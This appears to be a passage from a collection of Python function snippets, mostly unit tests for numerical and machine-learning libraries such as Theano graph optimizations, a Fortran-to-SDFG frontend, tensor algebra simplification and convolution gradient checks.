0)\n \n @interpolated(self.storage, max_distance=0.75)\n def func(x):\n return [x**2, x]\n \n a = func(1)\n self.assertEqual(len(self.storage), 1)\n self.assertAllClose(a, [1**2, 1])\n \n a = func(2)\n self.assertEqual(len(self.storage), 2)\n self.assertAllClose(a, [2**2, 2])\n \n a = func(1)\n self.assertEqual(len(self.storage), 2)\n self.assertAllClose(a, [1**2, 1])\n \n a = func(1.5)\n self.assertEqual(len(self.storage), 2)\n self.assertAlmostEqual(a[0], 0.5*(1**2 + 2**2))\n self.assertAlmostEqual(a[1], 1.5)", "def test_multiple_case(self):\r\n\r\n shp = (3, 3)\r\n fx, fy, fz, fw = fmatrices('xyzw')\r\n dx, dy, dz, dw = dmatrices('xyzw')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fwv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dwv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float64').reshape(1, shp[0])\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n old_optimizer = mode._optimizer\r\n try:\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.including('ShapeOpt')\r\n mode._optimizer = mode._optimizer.excluding(\r\n 'local_elemwise_fusion')\r\n\r\n #test x / x -> 1\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([(fx/fx,[fx],[fxv],'float32'),\r\n (dx/dx,[dx],[dxv],'float64'),\r\n (fv/fv,[fv],[fvv],'float32'),\r\n (dv/dv,[dv],[dvv],'float64'),\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert (out == numpy.ones(shp, dtype=out_dtype)).all()\r\n topo = f.maker.fgraph.toposort()\r\n if sym_inputs[0].broadcastable[0]:\r\n assert len(topo) == 2\r\n assert isinstance(topo[0].op, Shape_i)\r\n assert isinstance(topo[1].op, tensor.Alloc)\r\n else:\r\n assert len(topo) == 3\r\n assert isinstance(topo[0].op, Shape_i)\r\n assert isinstance(topo[1].op, Shape_i)\r\n assert isinstance(topo[2].op, tensor.Alloc)\r\n assert(out_dtype == out.dtype)\r\n\r\n #test (x * y) / x -> y\r\n for id,(g, sym_inputs, val_inputs, nb_elemwise, out_dtype) in enumerate([\r\n ((dx*dy)/dx,[dx,dy],[dxv,dyv],0,'float64'),\r\n ((fx*fy)/fx,[fx,fy],[fxv,fyv],0,'float32'),\r\n ((dv*dy)/dv,[dv,dy],[dvv,dyv],0,'float64'),\r\n ((fv*fy)/fv,[fv,fy],[fvv,fyv],0,'float32'),\r\n #must broadcast as their is a dimshuffle in the computation\r\n ((dx*dv)/dx,[dx,dv],[dxv,dvv],1,'float64'),\r\n #topo: [Elemwise{second,no_inplace}(x, <TensorType(float64, row)>)]\r\n ((fx*fv)/fx,[fx,fv],[fxv,fvv],1,'float32')\r\n #topo: [Elemwise{second,no_inplace}(x, <TensorType(float32, row)>)]\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert(out_dtype == out.dtype)\r\n assert numpy.allclose(out, val_inputs[1])\r\n topo = f.maker.fgraph.toposort()\r\n print \"ID TOPO\", id, topo, sym_inputs\r\n for r, t in f.maker.fgraph.shape_feature.shape_of.items():\r\n print ' ', r, t\r\n if topo and not(len(topo)==1 and topo[0].op==deep_copy_op):\r\n for node in topo[:-1]:\r\n assert isinstance(node.op, Shape_i)\r\n assert isinstance(topo[-1].op, tensor.Alloc)\r\n\r\n #test x / y / x -> 1 / y\r\n for id,(g, sym_inputs, val_inputs, nb_elemwise, out_dtype) in enumerate([\r\n ((dx/dy)/dx,[dx,dy],[dxv,dyv],1,'float64'),\r\n ((fx/fy)/fx,[fx,fy],[fxv,fyv],1,'float32'),\r\n ((dv/dy)/dv,[dv,dy],[dvv,dyv],1,'float64'),\r\n ((fv/fy)/fv,[fv,fy],[fvv,fyv],1,'float32'),\r\n #must broadcast as their is a dimshuffle in the computation\r\n\r\n ((dx/dv)/dx,[dx,dv],[dxv,dvv],1,'float64'),\r\n #topo: [Shape_i, Shape_i, Elemwise{inv,no_inplace}(<TensorType(float64, row)>), Alloc]\r\n ((fx/fv)/fx,[fx,fv],[fxv,fvv],1,'float32'),\r\n #topo:[Shape_i, Shape_i, Elemwise{inv,no_inplace}(<TensorType(float32, row)>), Alloc]\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, (1 / val_inputs[1]))\r\n topo = f.maker.fgraph.toposort()\r\n print topo\r\n elem = [t for t in topo if isinstance(t.op, T.Elemwise)]\r\n assert len(elem) == nb_elemwise\r\n assert isinstance(elem[0].op, (T.Elemwise, ))\r\n assert isinstance(elem[0].op.scalar_op, (\r\n theano.scalar.basic.Inv, theano.scalar.basic.TrueDiv))\r\n assert(out_dtype == out.dtype)\r\n\r\n #test (a / b) * (b / c) * (c / d) -> a / d\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n ((dx / dy) * (dy / dz) * (dz / dw),[dx,dy,dz,dw],[dxv,dyv,dzv,dwv],'float64'),\r\n ((fx / fy) * (fy / fz) * (fz / fw),[fx,fy,fz,fw],[fxv,fyv,fzv,fwv],'float32'),\r\n ((dv / dy) * (dy / dz) * (dz / dw),[dv,dy,dz,dw],[dvv,dyv,dzv,dwv],'float64'),\r\n ((fv / fy) * (fy / fz) * (fz / fw),[fv,fy,fz,fw],[fvv,fyv,fzv,fwv],'float32'),\r\n ((dx / dv) * (dv / dz) * (dz / dw),[dx,dv,dz,dw],[dxv,dvv,dzv,dwv],'float64'),\r\n ((fx / fv) * (fv / fz) * (fz / fw),[fx,fv,fz,fw],[fxv,fvv,fzv,fwv],'float32'),\r\n ((dx / dy) * (dy / dv) * (dv / dw),[dx,dy,dv,dw],[dxv,dyv,dvv,dwv],'float64'),\r\n ((fx / fy) * (fy / fv) * (fv / fw),[fx,fy,fv,fw],[fxv,fyv,fvv,fwv],'float32'),\r\n ((dx / dy) * (dy / dz) * (dz / dv),[dx,dy,dz,dv],[dxv,dyv,dzv,dvv],'float64'),\r\n ((fx / fy) * (fy / fz) * (fz / fv),[fx,fy,fz,fv],[fxv,fyv,fzv,fvv],'float32'),\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, (val_inputs[0] / val_inputs[3]))\r\n topo = f.maker.fgraph.toposort()\r\n assert len(topo) == 1\r\n assert isinstance(topo[0].op, (T.Elemwise, ))\r\n assert isinstance(topo[0].op.scalar_op,\r\n theano.scalar.basic.TrueDiv)\r\n assert len(topo[0].inputs) == 2\r\n assert(out_dtype == out.dtype)\r\n\r\n #test (2.0 * x) / (4.0 * y) -> (0.5 * x) / y\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n (((2.0*dx)/(4.0*dy)),[dx,dy],[dxv,dyv],'float64'),\r\n (((2.0*fx)/(4.0*fy)),[fx,fy],[fxv,fyv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (((2.0*dv)/(4.0*dy)),[dv,dy],[dvv,dyv],'float64'),\r\n (((2.0*fv)/(4.0*fy)),[fv,fy],[fvv,fyv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (((2.0*dx)/(4.0*dv)),[dx,dv],[dxv,dvv],'float64'),\r\n (((2.0*fx)/(4.0*fv)),[fx,fv],[fxv,fvv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ]):\r\n\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, (0.5 *\r\n val_inputs[0] / val_inputs[1]))\r\n topo = f.maker.fgraph.toposort()\r\n assert len(topo) == 2\r\n assert isinstance(topo[0].op, (T.Elemwise, ))\r\n assert isinstance(topo[0].op.scalar_op,\r\n theano.scalar.basic.Mul)\r\n assert len(topo[0].inputs) == 2\r\n assert isinstance(topo[1].op, (T.Elemwise, ))\r\n assert isinstance(topo[1].op.scalar_op,\r\n theano.scalar.basic.TrueDiv)\r\n assert len(topo[1].inputs) == 2\r\n assert(out_dtype == out.dtype)\r\n\r\n #test 2 * x / 2 -> x\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n ((2*dx)/2,[dx],[dxv],'float64'),\r\n ((2*fx)/2,[fx],[fxv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ((2*dv)/2,[dv],[dvv],'float64'),\r\n ((2*fv)/2,[fv],[fvv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ]):\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, val_inputs[0])\r\n topo = f.maker.fgraph.toposort()\r\n assert len(topo) == 1\r\n topo[0].op == deep_copy_op\r\n assert(out_dtype == out.dtype)\r\n\r\n #test x / abs(x) -> sign(x)\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n (dx/abs(dx),[dx],[0.5-dxv],'float64'),\r\n (fx/abs(fx),[fx],[0.5-fxv], 'float32'),\r\n (dx/abs(dx),[dx],[0.1*dxv],'float64'),\r\n (fx/abs(fx),[fx],[0.1*fxv], 'float32'),\r\n (dv/abs(dv),[dv],[0.5-dvv],'float64'),\r\n (fv/abs(fv),[fv],[0.5-fvv], 'float32'),\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.all(numpy.isfinite(out))\r\n assert numpy.allclose(out, numpy.sign(val_inputs[0]))\r\n assert(out_dtype == out.dtype)\r\n assert len(f.maker.fgraph.toposort()) == 1\r\n\r\n #test (2*x) / (3*abs(x)) -> sign(x)\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n ((2 * dx) / (3 * abs(dx)), [dx], [0.5 - dxv], 'float64'),\r\n ((2 * fx) / (3 * abs(fx)), [fx], [0.5 - fxv],\r\n {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ((2 * dx) / (3 * abs(dx)), [dx], [0.1 * dxv], 'float64'),\r\n ((2 * fx) / (3 * abs(fx)), [fx], [0.1 * fxv],\r\n {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ((2 * dv) / (3 * abs(dv)), [dv], [0.5 - dvv], 'float64'),\r\n ((2 * fv) / (3 * abs(fv)), [fv], [0.5 - fvv],\r\n {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ]):\r\n\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n topo = f.maker.fgraph.toposort()\r\n out = f(*val_inputs)\r\n assert numpy.all(numpy.isfinite(out))\r\n assert numpy.allclose(out, numpy.sign(val_inputs[0]) * 2 / 3)\r\n assert(out_dtype == out.dtype)\r\n finally:\r\n mode._optimizer = old_optimizer", "def run_2dtest(dim=3):\n\n traces = []\n\n for smoothing in range(10, 101, 10):\n pencilbeams = []\n num_sight_lines = 100\n\n # Construct our pencilbeams\n xlin = np.linspace(0., 1., num_sight_lines+1) * smoothing\n ylin = np.linspace(0., 1., num_sight_lines+1) * smoothing\n X,Y = np.meshgrid(xlin, ylin)\n\n # Store resulting LoS integrations in results\n results = X\n for i in range(0,num_sight_lines+1):\n for j in range(0,num_sight_lines+1): \n results[i,j] = testsph(X[i,j],Y[i,j],smoothing,dim=dim)\n\n # Integrate the pencilbeam weightings to find the full SPH weighting\n # This is the plane x-z from origin along +ve x-axis (sitting at y=0)\n\n # Have to integrate across x for every y\n Int_step = np.zeros( num_sight_lines+1 )\n for iy in range(0, num_sight_lines+1):\n isfin = np.isfinite(results[iy,:])\n Int_step[iy] = integrate.trapz(results[iy,isfin], xlin[isfin])\n # Now integrate across y\n isfin = np.isfinite(Int_step)\n particle_integral = integrate.trapz(Int_step[isfin], ylin[isfin])\n # \"All smoothing lengths should integrate to the same value of unity \"\n # We've sampled a quadrant in x-y and integrated entirely along z, so mulitply by 4\n print particle_integral * 4.\n\n isfin = np.isfinite(results[0,:])\n traces.append(go.Scatter(y=results[0,isfin], x=xlin[isfin]))\n\n # The integral of the entire particle should be unity, the trace of axis will not be however\n plot(traces)", "def test_amp_sums_can_be_simplified(free_alg):\n dr = free_alg\n v = dr.names.v\n n, i, j = symbols('n i j')\n x = IndexedBase('x')\n r = Range('D', 0, n)\n\n tensor = dr.sum((i, r), (j, r), i ** 2 * x[j] * v[j])\n res = tensor.simplify_sums()\n assert res == dr.sum((j, r), (\n n ** 3 / 3 - n ** 2 / 2 + n / 6\n ) * x[j] * v[j])", "def test_fortran_frontend_view_test_3():\n test_name = \"view3_test\"\n test_string = \"\"\"\n PROGRAM \"\"\" + test_name + \"\"\"_program\nimplicit none\ninteger, parameter :: n=10\ndouble precision a(n,n+1,12),b(n,n+1,12)\n\nCALL \"\"\" + test_name + \"\"\"_function(a,b,n)\n\nend\n\nSUBROUTINE \"\"\" + test_name + \"\"\"_function(aa,bb,n)\n\ninteger, parameter :: n=10\ndouble precision a(n,n+1,12),b(n,n+1,12)\ninteger j,k\n\nj=1\n call viewlens(aa(:,:,j),bb(:,:,j),bb(:,:,j+1))\n\nend SUBROUTINE \"\"\" + test_name + \"\"\"_function\n\nSUBROUTINE viewlens(aa,bb,cc)\n\nIMPLICIT NONE\n\ndouble precision :: aa(10,11),bb(10,11),cc(10,11) \n\nINTEGER :: JK, JL\n\nDO JK=1,10\n DO JL=1,11\n cc(JK,JL)=bb(JK,JL)+aa(JK,JL)\n ENDDO\nENDDO\n\nEND SUBROUTINE viewlens\n \"\"\"\n sdfg = fortran_parser.create_sdfg_from_string(test_string, test_name)\n sdfg.simplify(verbose=True)\n a = np.full([10, 11, 12], 42, order=\"F\", dtype=np.float64)\n b = np.full([10, 11, 12], 42, order=\"F\", dtype=np.float64)\n\n b[0, 0, 0] = 1\n sdfg(aa=a, bb=b, n=10)\n assert (b[0, 0, 0] == 1)\n assert (b[0, 0, 1] == 43)", "def test_sum_pos_3() -> None:\n # 2nd step - 3rd square\n assert nth(sw.sum_walk(), 1) == 2", "def test_simple_2d(self):\r\n a = tt.dmatrix()\r\n increment = tt.dscalar()\r\n sl1 = slice(None)\r\n sl2_end = tt.lscalar()\r\n sl2 = slice(sl2_end)\r\n\r\n for do_set in [False, True]:\r\n\r\n if do_set:\r\n resut = tt.set_subtensor(a[sl1, sl2], increment)\r\n else:\r\n resut = tt.inc_subtensor(a[sl1, sl2], increment)\r\n\r\n f = theano.function([a, increment, sl2_end], resut)\r\n\r\n val_a = numpy.ones((5, 5))\r\n val_inc = 2.3\r\n val_sl2_end = 2\r\n\r\n result = f(val_a, val_inc, val_sl2_end)\r\n\r\n expected_result = numpy.copy(val_a)\r\n if do_set:\r\n expected_result[:, :val_sl2_end] = val_inc\r\n else:\r\n expected_result[:, :val_sl2_end] += val_inc\r\n\r\n utt.assert_allclose(result, expected_result)", "def test_indexed_increment(self, expr, result):\n j, l = dimify('j l')\n a = symbol(name='a', dimensions=(j, l), value=2., mode='indexed').base\n fa = a.function\n fa.data[1:, 1:] = 0\n\n eqn = eval(expr)\n Operator(eqn)(fa)\n assert np.allclose(fa.data, result, rtol=1e-12)", "def test_gradable_funcs(self):\n self.jit_grad_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_grad_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = None\n\n self.basic_lindblad.evaluation_mode = \"dense_vectorized\"\n\n self.jit_grad_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_grad_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([0.2, 0.4, 0.6, 0.8]))\n )\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_grad_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_grad_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([0.2, 0.4, 0.6, 0.8]))\n )\n\n self.basic_lindblad.rotating_frame = None", "def test052_2d_numerical_comparison_on_vs_np_mp(\n self,\n batch_size=8,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=2,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n # instantiate gradient at the output\n np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125\n\n tf.keras.backend.set_floatx('float16')\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=np_grad_out,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n dtype=Policy('infer_float32_vars'),\n )", "def test032_2d_numerical_comparison_on_vs_np(\n self,\n batch_size=8,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=2,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n # instantiate gradient at the output\n np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=np_grad_out,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n )", "def evaluable_view(self, stencil, offset=0):\n return self._evaluable_view(stencil, self.arr, offset)", "def test_fortran_frontend_view_test_2():\n test_name = \"view2_test\"\n test_string = \"\"\"\n PROGRAM \"\"\" + test_name + \"\"\"_program\nimplicit none\ninteger, parameter :: n=10\ndouble precision a(n,11,12),b(n,11,12),c(n,11,12)\n\nCALL \"\"\" + test_name + \"\"\"_function(a,b,c,n)\n\nend\n\nSUBROUTINE \"\"\" + test_name + \"\"\"_function(aa,bb,cc,n)\n\ninteger, parameter :: n=10\ndouble precision a(n,11,12),b(n,11,12),c(n,11,12)\ninteger j,k\n\nj=1\n call viewlens(aa(:,:,j),bb(:,:,j),cc(:,:,j))\nk=2\n call viewlens(aa(:,:,k),bb(:,:,k),cc(:,:,k))\n\nend SUBROUTINE \"\"\" + test_name + \"\"\"_function\n\nSUBROUTINE viewlens(aa,bb,cc)\n\nIMPLICIT NONE\n\ndouble precision :: aa(10,11),bb(10,11),cc(10,11) \n\nINTEGER :: JK, JL\n\nDO JK=1,10\n DO JL=1,11\n cc(JK,JL)=bb(JK,JL)+aa(JK,JL)\n ENDDO\nENDDO\n\nEND SUBROUTINE viewlens\n \"\"\"\n sdfg = fortran_parser.create_sdfg_from_string(test_string, test_name)\n sdfg.simplify(verbose=True)\n a = np.full([10, 11, 12], 42, order=\"F\", dtype=np.float64)\n b = np.full([10, 11, 12], 42, order=\"F\", dtype=np.float64)\n c = np.full([10, 11, 12], 42, order=\"F\", dtype=np.float64)\n\n b[0, 0, 0] = 1\n sdfg(aa=a, bb=b, cc=c, n=10)\n assert (c[0, 0, 0] == 43)\n assert (c[1, 1, 1] == 84)", "def test_elemwise3():\r\n\r\n shape = (3, 4, 5, 6)\r\n a = tcn.shared_constructor(theano._asarray(numpy.random.rand(*shape),\r\n dtype='float32'), 'a')\r\n b = tensor.fvector()\r\n new_val = (a + b).dimshuffle([2, 0, 3, 1])\r\n new_val *= tensor.exp(1 + b ** a).dimshuffle([2, 0, 3, 1])\r\n f = pfunc([b], [], updates=[(a, new_val)], mode=mode_with_gpu)\r\n has_elemwise = False\r\n for i, node in enumerate(f.maker.fgraph.toposort()):\r\n has_elemwise = has_elemwise or isinstance(node.op, tensor.Elemwise)\r\n assert not has_elemwise\r\n #let debugmode catch errors\r\n f(theano._asarray(numpy.random.rand(6), dtype='float32'))", "def test_stencil_derivative(grid, shape, SymbolType, dim):\n i = dim(grid) # issue fixtures+parametrize: github.com/pytest-dev/pytest/issues/349\n u = SymbolType(name='u', grid=grid)\n u.data[:] = 66.6\n di = u.diff(i)\n dii = u.diff(i, i)\n # Check for sympy Derivative objects\n assert(isinstance(di, Derivative) and isinstance(dii, Derivative))\n s_di = di.as_finite_difference([i - i.spacing, i])\n s_dii = dii.as_finite_difference([i - i.spacing, i, i + i.spacing])\n # Check stencil length of first and second derivatives\n assert(len(s_di.args) == 2 and len(s_dii.args) == 3)\n u_di = s_di.args[0].args[1]\n u_dii = s_di.args[0].args[1]\n # Ensure that devito meta-data survived symbolic transformation\n assert(u_di.grid.shape == shape and u_dii.grid.shape == shape)\n assert(u_di.shape == u.shape and u_dii.shape == u.shape)\n assert(np.allclose(u_di.data, 66.6))\n assert(np.allclose(u_dii.data, 66.6))", "def test022_2d_numerical_comparison_on_fprop_vs_np(\n self,\n batch_size=8,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=2,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=None,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n )", "def test_elemwise4():\r\n\r\n shape = (3, 4)\r\n a = tcn.shared_constructor(theano._asarray(numpy.random.rand(*shape),\r\n dtype='float32'), 'a')\r\n b = tensor.fvector()\r\n c = tensor.fvector()\r\n f = pfunc([b, c], [],\r\n updates=[(a, (a + b.dimshuffle('x', 0) * c.dimshuffle(0, 'x')))],\r\n mode=mode_with_gpu)\r\n has_elemwise = False\r\n for i, node in enumerate(f.maker.fgraph.toposort()):\r\n has_elemwise = has_elemwise or isinstance(node.op, tensor.Elemwise)\r\n assert not has_elemwise\r\n #let debugmode catch errors\r\n f(theano._asarray(numpy.random.rand(4), dtype='float32'),\r\n theano._asarray(numpy.random.rand(3), dtype='float32'))", "def test_generate_condition_function():\n masks = 4 # Always > 2\n vals = 15\n np_masks = np.random.randint(2, size=(masks, vals), dtype=bool)\n tf_masks = [tf.constant(i, dtype=tf.bool) for i in np_masks]\n # Generate the functions for and and or\n f_and = generate_condition_function(masks, \"and\")\n f_or = generate_condition_function(masks, \"or\")\n # Get the numpy and tf results\n np_ands = np.all(np_masks, axis=0)\n np_ors = np.any(np_masks, axis=0)\n tf_ands, idx_ands = f_and(*tf_masks)\n tf_ors, idx_ors = f_or(*tf_masks)\n # Check the values are the same\n util_check(np_ands, tf_ands, idx_ands)\n util_check(np_ors, tf_ors, idx_ors)\n # Check a combination\n f_comb = generate_condition_function(3, [\"and\", \"or\"])\n np_comb = np_masks[0] & np_masks[1] | np_masks[2]\n tf_comb, idx_comb = f_comb(*tf_masks[:3])\n util_check(np_comb, tf_comb, idx_comb)\n # Check failures\n with pytest.raises(ValueError):\n generate_condition_function(1, \"and\")\n with pytest.raises(ValueError):\n generate_condition_function(5, \"bad_condition\")\n with pytest.raises(ValueError):\n generate_condition_function(5, [\"or\", \"and\"])\n with pytest.raises(ValueError):\n generate_condition_function(3, [\"or\", \"bad_condition\"])", "def test_quad_flush_ind(self):", "def test_SMEB_args():\n testing_function('sme_bl', bilinear=True)", "def test_advanced_manipulations(free_alg):\n dr = free_alg\n p = dr.names\n i, j, k = p.i, p.j, p.k\n\n u = IndexedBase('u')\n v = IndexedBase('v')\n f = Vec('f')\n\n tensor = dr.einst(u[i, j] * f[j] + v[i, j] * f[j])\n assert tensor.n_terms == 2\n\n def has_u(term):\n \"\"\"Test if a term have u tensor.\"\"\"\n return term.amp.has(u)\n\n expect = dr.sum((j, p.R), u[i, j] * f[j])\n for res in [\n tensor.filter(has_u),\n tensor.bind(lambda x: [x] if has_u(x) else [])\n ]:\n assert res.n_terms == 1\n assert res == expect\n\n def subst_i(term):\n \"\"\"Substitute i index in the terms.\"\"\"\n return Term(term.sums, term.amp.xreplace({i: k}), term.vecs)\n\n expect = dr.sum((j, p.R), u[k, j] * f[j] + v[k, j] * f[j])\n for res in [\n tensor.map(subst_i),\n tensor.bind(lambda x: [subst_i(x)]),\n tensor.map2scalars(lambda x: x.xreplace({i: k}))\n ]:\n assert res.n_terms == 2\n assert res == expect\n\n alpha, beta = symbols('alpha beta')\n assert tensor.bind(\n lambda x: [Term(x.sums, x.amp * i_, x.vecs) for i_ in [alpha, beta]]\n ) == (tensor * alpha + tensor * beta)\n\n assert tensor.map2scalars(\n lambda x: x.xreplace({j: k})\n ) == dr.sum((j, p.R), u[i, k] * f[k] + v[i, k] * f[k])\n\n assert tensor.map2scalars(\n lambda x: x.xreplace({j: k}), skip_vecs=True\n ) == dr.sum((j, p.R), u[i, k] * f[j] + v[i, k] * f[j])", "def test_SMEL_args():\n testing_function('sme', bilinear=False)", "def test_sum_pos_4() -> None:\n # Third step, 4th square.\n assert nth(sw.sum_walk(), 2) == 4", "def test_add_op_jit():\n x = np.array([1, 2, 3, 4, 5, 6, 7])\n paddle_x = paddle.to_tensor(x).astype(\"float32\")\n paddle_x.stop_gradient = False\n print(paddle_x)\n a = 1\n b = 5\n out = custom_ops.slice_test(paddle_x, a, b)\n print(\"out: \", out)\n print(\"numpy out: \", x[a:b])\n assert np.allclose(out.numpy(), x[a:b])\n print(\"run success\")", "def inter_op_dp_inner_loop(\n n_layers, n_devices, submesh_sizes, valid_idxs_costs, max_n_succ_stages\n):\n F = np.full((n_layers + 1, n_layers + 1, n_devices + 1), np.inf, dtype=np.float32)\n F_stage_max = np.full(\n (n_layers + 1, n_layers + 1, n_devices + 1), 0.0, dtype=np.float32\n )\n F_argmin = np.full(\n (n_layers + 1, n_layers + 1, n_devices + 1, 3), -1, dtype=np.int32\n )\n F[0, n_layers, 0] = 0\n\n for d in range(1, n_devices + 1):\n for (\n l,\n i,\n submesh_shape_idx,\n sharding_config_idx,\n stage_cost,\n ) in valid_idxs_costs:\n l, i, submesh_shape_idx, sharding_config_idx = map(\n int, (l, i, submesh_shape_idx, sharding_config_idx)\n )\n\n n_submesh_devices = submesh_sizes[submesh_shape_idx]\n if n_submesh_devices <= d:\n for s in range(1, n_layers + 1):\n if (\n s - 1\n > max_n_succ_stages[\n l, i, submesh_shape_idx, sharding_config_idx\n ]\n ):\n continue\n\n new_cost = F[s - 1, i + 1, d - n_submesh_devices] + stage_cost\n if new_cost < F[s, l, d]:\n F[s, l, d] = new_cost\n F_argmin[s, l, d] = (\n i + 1,\n submesh_shape_idx,\n sharding_config_idx,\n )\n F_stage_max[s, l, d] = max(\n F_stage_max[s - 1, i + 1, d - n_submesh_devices], stage_cost\n )\n\n return F, F_stage_max, F_argmin", "def test():\n Z = func.evaluate_circuit(F, e_x, e_y, e_xor)\n if Z == d[0]:\n return 0\n elif Z == d[1]:\n return 1", "def test_positional_convolution_backward():\n i = 1\n for num_batch in [1, 2, 4]:\n for num_channel in [4, 8, 12]:\n for input_height, input_width in itertools.product([10, 12, 18], [10, 12, 18]):\n for num_filter in [2, 4, 8]:\n for kernel in [(3, 3), (2, 2)]:\n for stride in [(1, 1), (2, 2)]:\n for pad in [(0, 0), (1, 1)]:\n for dilate in [(1, 1), (2, 2)]:\n # for num_group in [1, 2, 4]:\n grad_nodes = ['im_data', 'scale_data', 'weight', 'bias']\n output_height = np.floor(\n (input_height + 2 * pad[0] - dilate[0] * (kernel[0] - 1) - 1) * 1.0 / stride[0]\n ) + 1\n output_width = np.floor(\n (input_width + 2 * pad[1] - dilate[1] * (kernel[1] - 1) - 1) * 1.0 / stride[1]\n ) + 1\n im_data = np.random.rand(num_batch, num_channel, input_height, input_width)\n scale_data = \\\n np.random.rand(num_batch, num_channel, int(output_height), int(output_width))\\\n * 0.8 + 0.1\n\n weight = np.random.normal(0, 0.001, (num_filter, num_channel, kernel[0], kernel[1]))\n bias = np.random.rand(num_filter)\n\n im_data_var = mx.symbol.Variable(name=\"im_data\")\n scale_data_var = mx.symbol.Variable(name=\"scale_data\")\n weight_var = mx.symbol.Variable(name=\"weight\")\n bias_var = mx.symbol.Variable(name=\"bias\")\n op = mx.sym.contrib.PositionalConvolution(name='test_op',\n data=im_data_var,\n scale=scale_data_var,\n weight=weight_var,\n bias=bias_var,\n num_filter=num_filter,\n kernel=kernel, stride=stride, pad=pad,\n dilate=dilate\n )\n rtol, atol = 1e-4, 1e-3\n # absolute(a - b) <= (atol + rtol * absolute(b))\n check_numeric_gradient(op, [im_data, scale_data, weight, bias], rtol=rtol,\n atol=atol, grad_nodes=grad_nodes, 